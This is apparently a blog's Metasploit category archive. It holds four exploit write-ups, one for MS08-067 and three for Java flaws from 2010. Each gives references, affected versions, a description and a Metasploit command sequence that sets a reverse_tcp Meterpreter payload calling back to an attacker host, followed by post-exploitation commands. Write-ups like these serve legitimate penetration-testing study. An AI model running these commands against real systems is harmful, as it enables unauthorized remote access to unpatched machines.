Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Exploits, Metasploit,

Timeline :

Milw0rm PoC provided by stephen lawler the 2008-10-23
Metasploit PoC provided by hdm the 2009-10-28
Microsoft patch “KB958644” provided the 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

Exploits, Metasploit,

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-10-21
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-09-08

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0094
ZDI-10-051

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit

Exploits, Metasploit,

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-08-20

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0840
ZDI-10-056

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0886 : Sun Java Web Start Plugin Command Line Argument Injection

Exploits, Metasploit,

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-04-09
Same vulnerability disclosed by Rubén the 2010-04-09
Metasploit PoC provided by jduck the 2010-04-14

    PoC provided by :

Tavis Ormandy
Rubén
jduck

    Reference(s) :

CVE-2010-0886

    Affected version(s) :

Java 6 Standard Edition prior to update 20

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 “are believed to be affected by this vulnerability.” In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

    Commands :

use exploit/windows/browser/java_ws_arginjec­t_altjvm
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig